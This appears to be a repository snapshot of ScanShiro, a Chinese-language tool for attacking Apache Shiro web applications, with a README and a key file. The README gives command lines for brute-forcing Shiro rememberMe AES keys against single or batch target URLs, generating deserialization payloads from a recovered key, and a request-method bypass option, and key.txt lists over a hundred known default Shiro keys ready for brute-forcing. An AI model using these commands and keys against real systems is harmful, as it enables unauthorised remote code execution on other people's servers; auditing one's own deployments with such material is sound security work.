├── README.md
└── key.txt


/README.md:
--------------------------------------------------------------------------------
 1 | # ScanShiro
 2 | 
 3 | >把去年写的ShiroScan 给重构了一下
 4 | 
 5 | ## Update
 6 | 1.扫描的判断逻辑,通过返回的rememberMe个数进行判断
 7 | 
 8 | 2.添加了bypass功能,可以发送随机的请求方法
 9 | 
10 | 
11 | ## 学习
12 | 
13 | [原理](http://www.lmxspace.com/2020/08/24/%E4%B8%80%E7%A7%8D%E5%8F%A6%E7%B1%BB%E7%9A%84shiro%E6%A3%80%E6%B5%8B%E6%96%B9%E5%BC%8F/)
14 | 
15 | ```java
16 | <1.2.4   shiro550
17 | <1.4.2   shiro721 https://cloud.tencent.com/developer/article/1944738 需要成功登录(目前还没有添加
18 | >1.4.2   换加密方法 aes cmg
19 | ```
20 | 
21 | ## 使用
22 | 
23 | ```java
24 | 暴力破解key
25 | java -jar ScanShiro.jar -u http://0.0.0.0 -k key.txt
26 |         
27 | 批量暴力破解key
28 | java -jar ScanShiro.jar -f url.txt -k key.txt
29 |         
30 | 根据正确的key生成payload 适合在有key无gadgets的情况下
31 | java -jar ScanShiro.jar -p payload.ser -c kPH+bIxk5D2deZiIxcaaaA==
32 | 
33 | -n 参数是值修改shiro中cookie的名字少部分环境存在,默认是rememberMe
34 |         
35 | -proxy 参数是代理 目前只支持socks5代理并且没有用户名密码
36 | 
37 | 支持 -bypass 1 
38 | 发送数据的请求方法
39 | ```
40 | 
41 | **说明:默认是先跑常规的模式如果没有跑出key就自动跑AES/GCM,并且生成payload的时候生成这两种的payload。怎么说呢工具肯定是存在误报的！！！**
42 | 
43 | 
44 | ## 问题
45 | 
46 |   1. 少部分环境存在shiro rememberMe参数为于post请求中 等待解决
47 |   2. 经过大量测试,发现当跑批量的时候小几率出现连接异常的问题.所以为了保证工具准确性建议提前测试目标连接情况
48 | 
49 | 


--------------------------------------------------------------------------------
/key.txt:
--------------------------------------------------------------------------------
  1 | 4AvVhmFLUs0KTA3Kprsdag==
  2 | wGiHplamyXlVB11UXWol8g==
  3 | 2AvVhdsgUs0FSA3SDFAdag==
  4 | 3AvVhmFLUs0KTA3Kprsdag==
  5 | Z3VucwAAAAAAAAAAAAAAAA==
  6 | U3ByaW5nQmxhZGUAAAAAAA==
  7 | wGiHplamyXlVB11UXWol8g==
  8 | 6ZmI6I2j5Y+R5aSn5ZOlAA==
  9 | kPH+bIxk5D2deZiIxcaaaA==
 10 | fCq+/xW488hMTCD+cmJ3aQ==
 11 | cGhyYWNrY3RmREUhfiMkZA==
 12 | kPH+bIxk5D2deZiIxcaaaA==
 13 | 4AvVhmFLUs0KTA3Kprsdag==
 14 | Z3VucwAAAAAAAAAAAAAAAA==
 15 | fCq+/xW488hMTCD+cmJ3aQ==
 16 | 0AvVhmFLUs0KTA3Kprsdag==
 17 | 1AvVhdsgUs0FSA3SDFAdag==
 18 | 1QWLxg+NYmxraMoxAXu/Iw==
 19 | 25BsmdYwjnfcWmnhAciDDg==
 20 | 2AvVhdsgUs0FSA3SDFAdag==
 21 | 3AvVhmFLUs0KTA3Kprsdag==
 22 | 3JvYhmBLUs0ETA5Kprsdag==
 23 | r0e3c16IdVkouZgk1TKVMg==
 24 | 5aaC5qKm5oqA5pyvAAAAAA==
 25 | 5AvVhmFLUs0KTA3Kprsdag==
 26 | 6AvVhmFLUs0KTA3Kprsdag==
 27 | 6NfXkC7YVCV5DASIrEm1Rg==
 28 | 6ZmI6I2j5Y+R5aSn5ZOlAA==
 29 | cmVtZW1iZXJNZQAAAAAAAA==
 30 | 7AvVhmFLUs0KTA3Kprsdag==
 31 | 8AvVhmFLUs0KTA3Kprsdag==
 32 | 8BvVhmFLUs0KTA3Kprsdag==
 33 | 9AvVhmFLUs0KTA3Kprsdag==
 34 | OUHYQzxQ/W9e/UjiAGu6rg==
 35 | a3dvbmcAAAAAAAAAAAAAAA==
 36 | aU1pcmFjbGVpTWlyYWNsZQ==
 37 | bWljcm9zAAAAAAAAAAAAAA==
 38 | bWluZS1hc3NldC1rZXk6QQ==
 39 | bXRvbnMAAAAAAAAAAAAAAA==
 40 | ZUdsaGJuSmxibVI2ZHc9PQ==
 41 | wGiHplamyXlVB11UXWol8g==
 42 | U3ByaW5nQmxhZGUAAAAAAA==
 43 | MTIzNDU2Nzg5MGFiY2RlZg==
 44 | L7RioUULEFhRyxM7a2R/Yg==
 45 | a2VlcE9uR29pbmdBbmRGaQ==
 46 | WcfHGU25gNnTxTlmJMeSpw==
 47 | OY//C4rhfwNxCQAQCrQQ1Q==
 48 | 5J7bIJIV0LQSN3c9LPitBQ==
 49 | f/SY5TIve5WWzT4aQlABJA==
 50 | bya2HkYo57u6fWh5theAWw==
 51 | WuB+y2gcHRnY2Lg9+Aqmqg==
 52 | 3qDVdLawoIr1xFd6ietnwg==
 53 | YI1+nBV//m7ELrIyDHm6DQ==
 54 | 6Zm+6I2j5Y+R5aS+5ZOlAA==
 55 | 2A2V+RFLUs+eTA3Kpr+dag==
 56 | 6ZmI6I2j3Y+R1aSn5BOlAA==
 57 | SkZpbmFsQmxhZGUAAAAAAA==
 58 | 2cVtiE83c4lIrELJwKGJUw==
 59 | fsHspZw/92PrS3XrPW+vxw==
 60 | XTx6CKLo/SdSgub+OPHSrw==
 61 | sHdIjUN6tzhl8xZMG3ULCQ==
 62 | O4pdf+7e+mZe8NyxMTPJmQ==
 63 | HWrBltGvEZc14h9VpMvZWw==
 64 | rPNqM6uKFCyaL10AK51UkQ==
 65 | Y1JxNSPXVwMkyvES/kJGeQ==
 66 | lT2UvDUmQwewm6mMoiw4Ig==
 67 | MPdCMZ9urzEA50JDlDYYDg==
 68 | xVmmoltfpb8tTceuT5R7Bw==
 69 | c+3hFGPjbgzGdrC+MHgoRQ==
 70 | ClLk69oNcA3m+s0jIMIkpg==
 71 | Bf7MfkNR0axGGptozrebag==
 72 | 1tC/xrDYs8ey+sa3emtiYw==
 73 | ZmFsYWRvLnh5ei5zaGlybw==
 74 | cGhyYWNrY3RmREUhfiMkZA==
 75 | IduElDUpDDXE677ZkhhKnQ==
 76 | yeAAo1E8BOeAYfBlm4NG9Q==
 77 | cGljYXMAAAAAAAAAAAAAAA==
 78 | 2itfW92XazYRi5ltW0M2yA==
 79 | XgGkgqGqYrix9lI6vxcrRw==
 80 | ertVhmFLUs0KTA3Kprsdag==
 81 | 5AvVhmFLUS0ATA4Kprsdag==
 82 | s0KTA3mFLUprK4AvVhsdag==
 83 | hBlzKg78ajaZuTE0VLzDDg==
 84 | 9FvVhtFLUs0KnA3Kprsdyg==
 85 | d2ViUmVtZW1iZXJNZUtleQ==
 86 | yNeUgSzL/CfiWw1GALg6Ag==
 87 | NGk/3cQ6F5/UNPRh8LpMIg==
 88 | 4BvVhmFLUs0KTA3Kprsdag==
 89 | MzVeSkYyWTI2OFVLZjRzZg==
 90 | A7UzJgh1+EWj5oBFi+mSgw==
 91 | c2hpcm9fYmF0aXMzMgAAAA==
 92 | i45FVt72K2kLgvFrJtoZRw==
 93 | U3BAbW5nQmxhZGUAAAAAAA==
 94 | ZnJlc2h6Y24xMjM0NTY3OA==
 95 | Jt3C93kMR9D5e8QzwfsiMw==
 96 | MTIzNDU2NzgxMjM0NTY3OA==
 97 | vXP33AonIp9bFwGl7aT7rA==
 98 | V2hhdCBUaGUgSGVsbAAAAA==
 99 | Z3h6eWd4enklMjElMjElMjE=
100 | Q01TX0JGTFlLRVlfMjAxOQ==
101 | ZAvph3dsQs0FSL3SDFAdag==
102 | Is9zJ3pzNh2cgTHB4ua3+Q==
103 | NsZXjXVklWPZwOfkvk6kUA==
104 | GAevYnznvgNCURavBhCr1w==
105 | 66v1O8keKNV3TTcGPK1wzg==
106 | SDKOLKn2J1j/2BHjeZwAoQ==
107 | 


--------------------------------------------------------------------------------